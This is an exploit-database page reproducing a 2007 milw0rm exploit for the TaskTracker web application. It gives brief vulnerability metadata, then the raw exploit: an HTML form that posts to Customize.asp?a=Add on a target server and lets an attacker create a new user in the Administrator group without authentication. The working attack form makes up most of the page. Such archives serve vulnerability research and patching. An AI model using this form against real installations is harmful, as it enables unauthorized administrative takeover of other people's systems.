header-logo
Suggest Exploit
vendor:
TaskTracker
by:
ajann
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: TaskTracker
Affected Version From: All versions of TaskTracker
Affected Version To: All versions of TaskTracker
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

TaskTracker All Version Remote Add Admin Exploit

This exploit allows an attacker to add an admin user remotely to the TaskTracker application. The vulnerability exists in the Customize.asp file, which can be accessed through the 'Add' action. By submitting a specially crafted form, an attacker can create a new admin user with the desired credentials.

Mitigation:

Apply a patch or update to a non-vulnerable version of the TaskTracker application.
Source

Exploit-DB raw data:

<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
	<td valign=top class='data3'>
       	<input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

	</td>
	<td valign=top class='data3'>
		<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
	</td>
	<td valign=top class='data3'>
		<select name="GroupID" class="selectedtextboxes">
			<option value="1">Publisher</option>
			<option value="2">Editor</option>

			<option value="3">Administrator</option>
		</select>
	</td>
	<td valign=middle class='data3' align="center" colspan="2" align="center">
    	<input type="submit" value="Gonder">
    	</form>

# milw0rm.com [2007-01-01]

Navigation

Suggest Exploit

Services By CQR